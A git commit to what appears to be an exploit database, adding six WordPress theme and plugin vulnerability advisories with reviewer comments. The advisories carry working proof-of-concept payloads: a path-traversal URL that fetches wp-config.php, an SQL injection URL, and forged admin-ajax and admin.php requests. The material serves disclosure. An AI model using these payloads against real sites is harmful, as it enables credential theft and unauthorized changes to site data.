DB: 2016-01-25
6 new exploits
parent 73e749c845
commit 5f07a690c4
7 changed files with 73 additions and 0 deletions
|
@ -35539,3 +35539,9 @@ id,file,description,date,author,platform,type,port
|
|||
39296,platforms/php/webapps/39296.txt,"WordPress Urban City Theme 'download.php' Arbitrary File Download Vulnerabilitiy",2014-09-08,"Ashiyane Digital Security Team",php,webapps,0
|
||||
39297,platforms/php/webapps/39297.txt,"WordPress Authentic Theme 'download.php' Arbitrary File Download Vulnerabilitiy",2014-09-08,"Ashiyane Digital Security Team",php,webapps,0
|
||||
39298,platforms/php/webapps/39298.txt,"WordPress Epic Theme 'download.php' Arbitrary File Download Vulnerabilitiy",2014-09-08,"Ashiyane Digital Security Team",php,webapps,0
|
||||
39299,platforms/php/webapps/39299.txt,"WordPress Antioch Theme 'download.php' Arbitrary File Download Vulnerabilitiy",2014-09-08,"Ashiyane Digital Security Team",php,webapps,0
|
||||
39300,platforms/php/webapps/39300.txt,"WordPress Spider Facebook Plugin 'facebook.php' SQL Injection Vulnerability",2014-09-07,"Claudio Viviani",php,webapps,0
|
||||
39301,platforms/php/webapps/39301.html,"WordPress Ninja Forms Plugin Authorization Bypass Vulnerability",2014-09-08,Voxel@Night,php,webapps,0
|
||||
39302,platforms/php/webapps/39302.html,"WordPress WP to Twitter Plugin Authorization Bypass Vulnerability",2014-09-08,Voxel@Night,php,webapps,0
|
||||
39303,platforms/php/webapps/39303.txt,"WordPress Xhanch My Twitter Plugin Cross Site Request Forgery Vulnerability",2014-09-08,Voxel@Night,php,webapps,0
|
||||
39304,platforms/php/webapps/39304.txt,"WordPress W3 Total Cache Plugin 'admin.php' Cross Site Request Forgery Vulnerability",2014-09-08,Voxel@Night,php,webapps,0
|
||||
|
|
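Review bot: The description field of the added 39299 row ends in "Vulnerabilitiy", the same misspelling carried by the context rows 39296 to 39298. Correct it to "Vulnerability" in the new row, and ideally in the three existing ones, so that a text search of the description column finds these entries. The date column on the six added rows is 2014-09-07 or 2014-09-08 while the commit is dated 2016-01-25; if that column holds the disclosure date rather than the date the entry was added, a note next to the `id,file,description,date,...` header saying so would prevent misreading.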
|
7
platforms/php/webapps/39299.txt
Executable file
|
@ -0,0 +1,7 @@
|
|||
source: http://www.securityfocus.com/bid/69673/info
|
||||
|
||||
Antioch theme for Wordpress is prone to an arbitrary file-download vulnerability.
|
||||
|
||||
An attacker can exploit this issue to download arbitrary files from the web server and obtain potentially sensitive information.
|
||||
|
||||
http://www.example.com/wp-content/themes/antioch/lib/scripts/download.php?file=../../../../../wp-config.php
|
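Review bot: The advisory text has no affected-version line, unlike the other five files added in this commit, which each state that a given version "is vulnerable; other versions may also be affected." Add the tested theme version, or say explicitly that it is not known, so a site owner can tell whether their installed copy of the Antioch theme is in scope. It would also help to name the vulnerable input in the prose (the `file` parameter of lib/scripts/download.php accepting `../` sequences), since at present that is only inferable from the example URL.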
9
platforms/php/webapps/39300.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/69675/info
|
||||
|
||||
Spider Facebook plugin for WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
|
||||
|
||||
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
||||
|
||||
Spider Facebook 1.0.8 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/wordpress/wp-admin/admin.php?page=Spider_Facebook_manage&task=Spider_Facebook_edit&id=1 and 1=2
|
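Review bot: The example URL on the last line contains unencoded spaces (`id=1 and 1=2`), so it is ambiguous where the URL ends, and the prose never names the parameter at fault. State in the description that `id` on the Spider_Facebook_edit task is the unsanitized input, and note whether the request needs an authenticated wp-admin session, since the path is under /wp-admin/ and that changes how the issue is triaged.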
15
platforms/php/webapps/39301.html
Executable file
|
@ -0,0 +1,15 @@
|
|||
source: http://www.securityfocus.com/bid/69740/info
|
||||
|
||||
The Ninja Forms Plugin for WordPress is prone to an authorization-bypass vulnerability.
|
||||
|
||||
An attacker can exploit this issue to bypass certain security restrictions and perform unauthorized actions; this may aid in launching further attacks.
|
||||
|
||||
Ninja Forms Plugin 2.7.7 is vulnerable; other versions may also be affected.
|
||||
|
||||
<html><body>
|
||||
<form action="http://www.example.com/wordpress/wp-admin/admin-ajax.php" method="POST">
|
||||
form id: <input name="form_id" value="1"><br>
|
||||
action: <input name="action" value="ninja_forms_delete_form">
|
||||
<input type="submit" value="submit">
|
||||
</form>
|
||||
</body></html>
|
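Review bot: The description says "authorization-bypass" but does not state what privilege the request is sent with or which check is missing, which is the fact a defender needs in order to triage it. The form posts `action=ninja_forms_delete_form` to admin-ajax.php with no nonce or token field; add one sentence saying whether the request succeeds unauthenticated or from a low-privilege account. The advisory prose also sits before `<html><body>` in a .html file, so it would be cleaner inside an HTML comment.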
18
platforms/php/webapps/39302.html
Executable file
|
@ -0,0 +1,18 @@
|
|||
source: http://www.securityfocus.com/bid/69741/info
|
||||
|
||||
WP to Twitter Plugin for WordPress is prone to an authorization-bypass vulnerability.
|
||||
|
||||
An attacker can exploit this issue to bypass certain security restrictions and perform unauthorized actions; this may aid in launching further attacks.
|
||||
|
||||
WP to Twitter 2.9.3 is vulnerable; other versions may also be affected.
|
||||
|
||||
<html><body>
|
||||
<form method="post" action="http://www.example.com/wordpress/wp-admin/admin-ajax.php">
|
||||
action:<input name="action" value="wpt_tweet"><br>
|
||||
tweet action:<input name="tweet_action" value="tweet"><br>
|
||||
tweet text: <input value="" name="tweet_text"><br>
|
||||
tweet schedule: <input value="undefined+undefined" name="tweet_schedule"><br>
|
||||
tweet post id: <input value="1" name="tweet_post_id"><br>
|
||||
<input type="submit" value="Submit">
|
||||
</form>
|
||||
</body></html>
|
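Review bot: The `tweet_schedule` field is pre-filled with `undefined+undefined`, which reads like residue from a captured browser request rather than a deliberate value. Either document why the field is needed or drop it, and, as with the other authorization-bypass entry in this commit, say which privilege level the `wpt_tweet` action is reachable from.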
9
platforms/php/webapps/39303.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/69744/info
|
||||
|
||||
Xhanch My Twitter plugin for WordPress is prone to a cross-site request-forgery vulnerability.
|
||||
|
||||
An attacker can exploit the cross-site request forgery issue to perform unauthorized actions in the context of a logged-in user of the affected application. This may aid in other attacks.
|
||||
|
||||
Xhanch My Twitter 2.7.7 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/wordpress/?xmt_Primary_twt_id=508351521810300928
|
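Review bot: The entry gives a single GET URL with `xmt_Primary_twt_id=508351521810300928` but never says what state that request changes, so the cross-site request forgery claim cannot be assessed from the file alone. Add a sentence describing the action performed on behalf of the logged-in user and which user role has to be logged in.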
9
platforms/php/webapps/39304.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/69745/info
|
||||
|
||||
W3 Total Cache plugin for WordPress is prone to a cross-site request-forgery vulnerability.
|
||||
|
||||
An attacker can exploit the cross-site request forgery issue to perform unauthorized actions in the context of a logged-in user of the affected application. This may aid in other attacks.
|
||||
|
||||
W3 Total Cache 0.9.4 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/wordpress/wp-admin/admin.php?page=w3tc_general&w3tc_note=enabled_edge
|
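Review bot: The file is listed as "Executable file", as are the other five files added in this commit, although each is a plain-text or HTML advisory; add them with a non-executable mode such as 0644. The description is also word for word the generic text used in 39303.txt and does not say what `w3tc_note=enabled_edge` does when a logged-in user's browser requests it; one sentence on the resulting action would make the entry usable for triage.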